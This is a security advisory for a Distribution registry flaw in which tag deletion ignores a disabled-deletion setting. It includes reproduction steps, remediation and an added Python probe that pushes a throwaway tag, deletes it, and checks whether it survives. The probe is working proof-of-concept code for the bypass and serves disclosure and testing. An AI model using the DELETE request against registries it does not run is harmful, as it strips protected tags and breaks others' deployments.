Distribution Authorization Bypass Vulnerability Allowing Tag Deletion
Vulnerability
A vulnerability in the Distribution toolkit (the OCI registry implementation), prior to version 3.1.1, allows tags to be deleted from repositories even when the operator has disabled deletion. The configuration key storage.delete.enabled: false is meant to turn off deletion, but the handler behind DELETE /v2/<name>/manifests/<tag> never consults it: a tag deletion is passed straight to the storage driver, so the tag is removed regardless of the setting. Any API client that can reach the endpoint can therefore untag a manifest, which is exactly the case the setting exists to prevent. Note that this bypasses the operator's delete policy, not the registry's authentication: whatever authentication or token scopes front the registry still apply to the request.
Impact
Exploitation is an authorization bypass: any client able to reach the registry API can remove tags the operator intended to be protected from deletion. Only the tag reference is removed, so pulls by digest keep working, but consumers that pull by tag (the common case for CI pipelines and deployments) fail to resolve the image until the tag is re-pushed. Removing trusted tags from a shared registry is therefore a direct supply-chain disruption.
Reproduction
To reproduce, run Distribution with a configuration that disables deletion (storage.delete.enabled: false), push any image with a tag, then issue DELETE /v2/<name>/manifests/<tag> against it. An affected registry accepts the request and the tag stops resolving (a HEAD or GET on the same path no longer finds it), even though deletion is disabled; a registry that honours the setting refuses the DELETE and the tag remains.
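The reproduction above, as an added probe script (not code from the advisory or from the Distribution project): it pushes a throwaway layer-less manifest under a tag, sends DELETE /v2/<name>/manifests/<tag>, then checks whether the tag still resolves. Run it against a registry whose configuration sets storage.delete.enabled: false; a tag that disappears means the policy was bypassed. It assumes the registry needs no authentication and that the registry URL and repository name are supplied by the caller; the FakeRegistry class and the 202/405 status codes it returns are a constructed in-memory stand-in so the script also runs offline.

```python
# Added example for this advisory (not Distribution project code): probe whether
# DELETE /v2/<name>/manifests/<tag> is honoured or bypasses a disabled-delete policy.
# Assumptions: no auth on the registry; registry URL and repo name come from the caller.
import hashlib
import json
import urllib.error
import urllib.parse
import urllib.request

OCI_MANIFEST = "application/vnd.oci.image.manifest.v1+json"
OCI_CONFIG = "application/vnd.oci.image.config.v1+json"


def sha256_digest(data: bytes) -> str:
    return "sha256:" + hashlib.sha256(data).hexdigest()


def urllib_transport(method, url, body=None, headers=None):
    """Real HTTP transport: returns (status, lower-cased response headers)."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}


def push_minimal_image(transport, registry, name, tag):
    """Upload an empty config blob, then a layer-less OCI manifest under `tag`."""
    config = b"{}"
    config_digest = sha256_digest(config)
    status, hdrs = transport("POST", f"{registry}/v2/{name}/blobs/uploads/", b"", {})
    if status != 202:
        raise RuntimeError(f"upload start failed: HTTP {status}")
    location = urllib.parse.urljoin(registry + "/", hdrs["location"])  # may be relative
    sep = "&" if "?" in location else "?"  # Location often already carries a query
    status, _ = transport("PUT", f"{location}{sep}digest={config_digest}", config,
                          {"Content-Type": "application/octet-stream"})
    if status != 201:
        raise RuntimeError(f"blob upload failed: HTTP {status}")
    manifest = json.dumps({
        "schemaVersion": 2,
        "mediaType": OCI_MANIFEST,
        "config": {"mediaType": OCI_CONFIG, "digest": config_digest, "size": len(config)},
        "layers": [],
    }).encode()
    status, _ = transport("PUT", f"{registry}/v2/{name}/manifests/{tag}", manifest,
                          {"Content-Type": OCI_MANIFEST})
    if status != 201:
        raise RuntimeError(f"manifest push failed: HTTP {status}")
    return sha256_digest(manifest)


def probe_tag_deletion(transport, registry, name, tag="delete-probe"):
    """Push a tag, DELETE it by tag, then HEAD it. With deletion disabled in the
    registry config, tag_survived should be True; False means the policy was
    bypassed (the behaviour described for Distribution before 3.1.1)."""
    push_minimal_image(transport, registry, name, tag)
    delete_status, _ = transport("DELETE", f"{registry}/v2/{name}/manifests/{tag}")
    head_status, _ = transport("HEAD", f"{registry}/v2/{name}/manifests/{tag}", None,
                               {"Accept": OCI_MANIFEST})
    return {"delete_status": delete_status, "head_status": head_status,
            "tag_survived": head_status == 200, "policy_bypassed": head_status != 200}


class FakeRegistry:
    """Constructed in-memory registry (single repo) so the probe runs offline.
    honours_delete_policy=False mimics the bug: DELETE by tag always untags.
    honours_delete_policy=True mimics a registry that refuses the DELETE."""

    def __init__(self, honours_delete_policy):
        self.honours = honours_delete_policy
        self.blobs, self.tags = set(), {}

    def __call__(self, method, url, body=None, headers=None):
        parts = urllib.parse.urlsplit(url)
        query = urllib.parse.parse_qs(parts.query)
        if method == "POST" and parts.path.endswith("/blobs/uploads/"):
            return 202, {"location": parts.path + "u1?_state=opaque"}  # relative Location
        if method == "PUT" and "/blobs/uploads/" in parts.path:
            self.blobs.add(query["digest"][0])
            return 201, {}
        ref = parts.path.rpartition("/manifests/")[2]
        if method == "PUT":
            if json.loads(body)["config"]["digest"] not in self.blobs:
                return 404, {}  # registries reject manifests whose blobs are missing
            self.tags[ref] = sha256_digest(body)
            return 201, {}
        if method == "DELETE":
            if self.honours:
                return 405, {}  # deletion disabled: refuse (status chosen for the fake)
            self.tags.pop(ref, None)
            return 202, {}
        if method == "HEAD":
            return (200 if ref in self.tags else 404), {}
        return 400, {}


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # e.g. python probe.py http://localhost:5000 library/scratch
        print(probe_tag_deletion(urllib_transport, sys.argv[1], sys.argv[2]))
    else:  # offline demonstration against the constructed fake
        for honours in (False, True):
            print("honours policy:", honours,
                  probe_tag_deletion(FakeRegistry(honours), "http://registry.test", "probe/tmp"))
```

Run it with the registry URL and a repository name you are allowed to push to; with no arguments it runs both fake outcomes so you can see what a bypass and an honoured policy look like in the returned dictionary. The probe only ever touches its own throwaway tag, and the transport is injected so the same logic can be pointed at a live registry or at the fake.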
Remediation
Update to Distribution version 3.1.1 or later. As a stopgap where an upgrade must wait, block the DELETE method for /v2/*/manifests/* at the reverse proxy in front of the registry: the bypass lives in the registry's own handler, so a request that never reaches it cannot trigger it.
